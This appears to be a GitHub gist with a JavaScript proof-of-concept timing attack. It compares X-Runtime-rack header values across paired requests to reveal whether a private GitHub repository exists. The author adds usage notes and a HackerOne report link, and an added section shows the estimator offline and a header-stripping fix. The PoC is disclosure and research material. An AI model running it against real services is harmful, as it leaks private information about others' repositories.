GitHub private repository existence disclosure timing attack
```javascript
"use strict";
const RepoExists = (name) => {
  const githubUrl = "https://github.com/" + name;
  const runtime = 'X-Runtime-rack';
  const threshold = 0.0077235; // Half of L-estimator of source deltas (~20ms)
  const deltas = [];
  const next = (samplesLeft) => {
    if (samplesLeft < 1) {
      // All samples collected: take an L-estimator (mean of the 40th and 60th
      // percentiles) of the deltas, which is robust to outlier samples.
      const len = deltas.length;
      deltas.sort((a, b) => a - b);
      const estimate = (deltas[len * 0.4 | 0] + deltas[len * 0.6 | 0]) / 2;
      return Promise.resolve(estimate >= threshold);
    }
    // Cache-busting random suffix; the control request targets a path that
    // cannot exist, the test request targets the repository under test.
    const random = Math.random().toString(36).slice(2);
    return Promise.all([
      fetch(githubUrl + random + '?_=' + random),
      fetch(githubUrl + '?_=' + random)
    ]).then((responses) => {
      const control = responses[0];
      const test = responses[1];
      if (!control.headers.has(runtime) || !test.headers.has(runtime)) {
        throw new Error(`GitHub did not provide ${runtime} header.`);
      }
      // Server-reported processing time of the test minus the control request.
      const delta = +test.headers.get(runtime)
        - +control.headers.get(runtime);
      deltas.push(delta);
      return next(samplesLeft - 1);
    });
  };
  return next(16);
};
```
@eligrey

eligrey commented Oct 11, 2018

PoC usage from the context of a GitHub.com URL (assuming X-Runtime-rack header is present):

RepoExists(repo_name).then(exists =>
    console.log("repo " + (exists ? "exists" : "doesn't exist"))
)

My HackerOne profile: https://hackerone.com/eli

HackerOne entry for this vulnerability (private, as GitHub has not disclosed it publicly): https://hackerone.com/reports/417374
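As an added example (not part of the gist or the HackerOne report), the statistic the PoC relies on, run offline on constructed deltas, next to the server-side fix of not sending per-request timing headers at all. The mean-versus-L-estimator comparison, the sample values and the header names other than X-Runtime-rack are assumptions.

```javascript
"use strict";

// Same estimator the PoC applies: sort the deltas, then average the values at
// the 40th and 60th percentiles. Unlike a mean, two wild samples barely move it.
const lEstimate = (samples) => {
  const sorted = [...samples].sort((a, b) => a - b);
  const len = sorted.length;
  return (sorted[(len * 0.4) | 0] + sorted[(len * 0.6) | 0]) / 2;
};
const mean = (samples) => samples.reduce((sum, x) => sum + x, 0) / samples.length;
const THRESHOLD = 0.0077235; // the PoC's cut-off, in seconds

// Constructed X-Runtime-rack deltas (test minus control, in seconds), not
// measured values. Both sets carry two large outliers standing in for GC
// pauses or cold caches; only the second set has a real ~20 ms offset.
const noOffsetDeltas = [-0.002, 0.001, -0.001, 0.002, 0.0, 0.001, 0.300, 0.250];
const offsetDeltas   = [0.019, 0.021, 0.020, 0.018, 0.022, 0.020, 0.250, -0.200];

// Server-side fix: never send per-request processing time to the client.
// Header names other than X-Runtime-rack are assumed examples, not from the gist.
const TIMING_HEADERS = ["x-runtime", "x-runtime-rack", "server-timing"];
const stripTimingHeaders = (headers) => {
  const kept = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!TIMING_HEADERS.includes(name.toLowerCase())) kept[name] = value;
  }
  return kept;
};

// Constructed response headers for a 404 on a repository path.
const constructedResponse = {
  "Content-Type": "text/html; charset=utf-8",
  "X-Runtime-rack": "0.031204",
  "Cache-Control": "no-cache",
};

console.log("no offset: mean", mean(noOffsetDeltas).toFixed(4),
            "L-estimate", lEstimate(noOffsetDeltas).toFixed(4));
console.log("offset:    mean", mean(offsetDeltas).toFixed(4),
            "L-estimate", lEstimate(offsetDeltas).toFixed(4));
console.log("hardened headers:", Object.keys(stripTimingHeaders(constructedResponse)));
```

With the outliers present the plain mean of the no-offset set lands above the cut-off while the L-estimator stays near zero, which is why the PoC needs so few samples; removing the header removes the signal the estimator is fed.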
